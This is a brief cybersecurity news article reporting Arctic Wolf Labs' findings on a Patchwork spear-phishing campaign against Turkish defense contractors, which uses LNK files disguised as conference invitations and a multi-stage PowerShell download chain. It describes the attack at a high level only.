The notorious hacking group known as Patchwork has launched a new spear-phishing campaign aimed at Turkish defense contractors, with intentions of gathering crucial intelligence, according to a report from Arctic Wolf Labs. This targeted operation primarily utilizes malicious LNK files disguised as conference invitations about unmanned vehicle systems.
Details concerning the campaign highlight its five-stage execution chain, which is particularly alarming given the geopolitical backdrop of increasing defense collaboration between Pakistan and Türkiye amid escalating India-Pakistan tensions. Notably, the campaign also focuses on an undisclosed manufacturer involved in precision-guided missile systems.
Patchwork, identified by multiple names including APT-C-09 and Dropping Elephant, is recognized as a state-sponsored threat actor with origins in India. This group has been active since at least 2009 and has a history of targeting organizations across South Asia, including in China and Pakistan. Recent activities have included attacks related to Chinese universities and sectors sensitive to national security, amplifying concerns regarding the group’s capabilities and strategic objectives.
Furthermore, the phishing attack leverages a sophisticated mechanism whereby an infected LNK file executes PowerShell commands that download payloads from a domain specifically created just weeks ago. This added layer of complexity underscores a calculated effort by Patchwork to adapt and refine its attack methods, emphasizing the importance of robust cybersecurity measures in the defense sector.
To learn more about the report that details these activities, please visit Arctic Wolf Labs. For historical context regarding Patchwork’s activities, additional information can be found at The Hacker News detailing previous campaigns.
This recent escalation in cyber threats highlights the ongoing risk to national security posed by advanced persistent threats like Patchwork, necessitating heightened vigilance and preventive strategies within critical industry sectors.